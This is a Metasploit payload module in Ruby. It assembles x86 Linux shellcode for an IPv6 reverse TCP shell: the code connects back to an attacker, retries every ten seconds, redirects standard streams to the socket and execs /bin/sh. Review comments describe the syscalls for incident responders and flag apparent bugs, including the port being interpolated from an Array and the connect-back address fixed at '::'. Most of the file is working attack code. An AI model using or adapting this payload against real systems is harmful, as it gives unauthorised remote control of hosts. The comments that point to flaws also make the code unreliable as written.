##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
  # Byte size of the assembled payload as last recorded for this module; the
  # framework uses it where only the size is needed without assembling.
  # NOTE(review): has to be regenerated whenever the assembly below changes.
  CachedSize = 168

  include Msf::Payload::Single
  include Msf::Payload::Linux
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata: a single (non-staged) Linux x86 payload,
  # paired with the ReverseTcp handler and a Unix command-shell session type.
  #
  # @param info [Hash] caller-supplied metadata merged over the defaults below
  def initialize(info = {})
    super(merge_info(info,
      'Name' => 'Linux Command Shell, Reverse TCP Inline (IPv6)',
      'Description' => 'Connect back to attacker and spawn a command shell over IPv6',
      'Author' => 'Matteo Malvica <matteo[at]malvica.com>',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_X86,
      'Handler' => Msf::Handler::ReverseTcp,
      'Session' => Msf::Sessions::CommandShellUnix
    ))
  end

  # Assembles the x86 Linux shellcode with Metasm and returns the raw bytes.
  #
  # Only LPORT is consumed from the datastore: it is packed as a big-endian
  # (network order) 16-bit value and interpolated as hex into the sockaddr_in6
  # that the assembly builds on the stack.
  #
  # NOTE(review): String#unpack returns an Array, so `tcp_port` holds e.g.
  # ["115c"] (constructed example); interpolating an Array with #{} uses its
  # inspect form on modern Ruby, not the bare hex digits — confirm what text
  # actually reaches the assembler (a generated sample or the cached-size
  # check would show it).
  # NOTE(review): datastore['LHOST'] is never referenced; the 16 address
  # bytes of the sockaddr_in6 are supplied by `push ebx` with ebx = 0 (the
  # unspecified address ::), so the connect-back target is not configurable
  # from this module — confirm whether that is intended.
  #
  # What the assembly does on the host (x86 Linux int 0x80 syscalls), which is
  # what a responder matching a capture or process tree to this payload needs:
  #   - socketcall(SYS_SOCKET, AF_INET6, SOCK_STREAM, IPPROTO_TCP); fd kept in esi
  #   - fork(): the parent takes the `exit` label (exit(0)), the child goes on
  #   - `connect`: socketcall(SYS_CONNECT) with a 28-byte (0x1c) sockaddr_in6
  #   - on a non-zero result, `retry`: nanosleep for a 10-second timespec, then
  #     jump back to `connect` (each pass re-pushes the sockaddr and argument
  #     array, so the stack grows by a few dozen bytes per attempt —
  #     presumably tolerated given the 10 s pause; no retry limit is visible)
  #   - on success: dup2 the socket onto fds 0, 1 and 2, then execve of
  #     "/bin//sh" with a NULL argv/envp
  #
  # @return [String] the assembled machine code
  def generate_stage
    temp = [datastore['LPORT'].to_i].pack('S>')
    tcp_port = temp.unpack('H*')
    payload_data =<<-EOS
xor ebx,ebx
mul ebx
push 0x6
push 0x1
push 0xa
mov ecx,esp
mov al,0x66
mov bl,0x1
int 0x80
mov esi,eax
xor eax,eax
mov al,0x2
xor ebx,ebx
int 0x80
cmp eax,ebx
je connect
ja exit
connect:
xor ecx,ecx
xor ebx,ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push.i16 0x#{tcp_port}
push.i16 0xa
mov ecx, esp
push.i8 0x1c
push ecx
push esi
xor ebx,ebx
xor eax,eax
mov al,0x66
mov bl,0x3
mov ecx,esp
int 0x80
xor ebx,ebx
cmp eax,ebx
jne retry
xor ecx,ecx
mul ecx
mov ebx,esi
mov al,0x3f
int 0x80
xor eax,eax
inc ecx
mov ebx,esi
mov al,0x3f
int 0x80
xor eax,eax
inc ecx
mov ebx,esi
mov al,0x3f
int 0x80
xor edx,edx
mul edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0xb
int 0x80
ret
retry:
xor ebx,ebx
push ebx
push.i8 0xa
mul ebx
mov ebx,esp
mov al,0xa2
int 0x80
jmp connect
ret
exit:
xor eax,eax
mov al,0x1
int 0x80
EOS
    # Assemble for IA-32 and hand back the raw bytes; Metasm resolves the
    # `connect`/`retry`/`exit` labels and the push.i8/push.i16 size hints.
    Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
  end
end